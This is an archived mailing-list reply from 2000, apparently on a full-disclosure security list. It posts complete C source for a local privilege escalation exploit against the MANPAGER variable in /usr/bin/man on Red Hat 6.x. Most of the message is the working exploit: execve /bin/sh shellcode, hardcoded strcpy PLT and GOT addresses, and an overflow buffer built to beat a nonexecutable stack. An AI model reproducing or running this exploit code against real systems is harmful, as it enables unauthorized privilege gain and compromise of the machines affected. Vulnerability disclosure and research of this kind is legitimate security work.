Re: man-exploit for MANPAGER environment...

Wed, 26 Apr 2000 18:03:42 -0700 

On Mon, 24 Apr 2000 [EMAIL PROTECTED] wrote:

> For the sake of full disclosure an exploit for the MANPAGER environment
> variable:
> 
> - snip -
> 
> /*
>  * MAN-Exploit for MANPAGER environmental variable.
>  * rh 6.x, tested on rh 6.1
>  * written by psychoid/tCl
>  * gives egid man.
>  *
>  * Originally discovered by lcamtuf.
>  * educational. yes.
>  *
>  */
> 

For absolutely FULL disclosure here is wonderfull man sploit (allready
posted to vuln-dev in thread of sth...) that works cool even if stack is
nonexecutable (it exploits the feature of GOT being executable -- see
vuln-dev archives for details: 
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-04-15&[EMAIL PROTECTED]).

GreetZ Bulba, Lam3rZ, teso, hert, Smerda Jajeczny.

Kil3r / Emsi / M.C.Mar /

--
Mariusz Wołoszyn
Internet Security Specialist, Internet Partners, GTS Poland

/*
 * Rewriten from:
 * (c) 2000 babcia padlina / b0f
 * (lcamtuf's idea)
 * by Kil3r of Lam3rZ
 * for nonexec stack environment
 * 
 * redhat 6.1 (and others) /usr/bin/man exploit
*/

        char execshell[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";


#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define STRCPY          0x80490e4       // <== strcpy() PLT entry
#define GOT             0x805038c       // <== strcpy() GOT entry
#define NOP             0x90
#define BUFSIZE         4033+38
#define RET             STRCPY          //0x46464646
#define _BIN_SH         0xbfffffe7      // <== where we have "/bin/sh" string,
                                        //    curently useless ;)
#define SHELLCODE       0xbfffffc1

long getesp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(argc, argv)
int argc;
char **argv;
{
        char buf[BUFSIZE], *p;
        char *env[3];
        int *ap;

        memset(buf,NOP,BUFSIZE);

        p=buf+BUFSIZE-4;
        ap=(int *)p;
        *ap++ =RET;
        *ap++ =GOT+4;
        *ap++ =GOT+4;
        *ap++ =SHELLCODE;

        fprintf(stderr, "RET: 0x%x  SHELLCODE: 0x%x", RET, SHELLCODE);

        memcpy(buf,"MANPAGER=", 9);
        env[0]=buf;
//      env[1]="/bin/sh";
        env[1]=execshell;
        env[2]=(char *)0;
        execle("/usr/bin/man", "man", "ls", 0, env); // use execle to have
                                // shellcode and other params at fixed addr!!!

        return 0;
}

Reply via email to